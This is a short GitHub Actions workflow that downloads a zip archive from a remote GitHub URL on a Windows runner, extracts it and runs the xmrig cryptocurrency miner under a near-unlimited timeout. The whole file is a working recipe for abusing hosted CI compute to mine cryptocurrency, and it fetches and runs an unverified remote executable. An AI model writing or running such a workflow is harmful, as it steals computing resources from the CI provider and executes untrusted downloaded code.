name: miner

on: 
  workflow_dispatch:

jobs:
  build:
    name: start mine
    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: downloading files...
      run: |
         Invoke-WebRequest https://raw.githubusercontent.com/techtechnikov/main/windows.zip -OutFile windows.zip
         Expand-Archive windows.zip
    - name: starting miner
      run: |
        windows/xmrig.exe
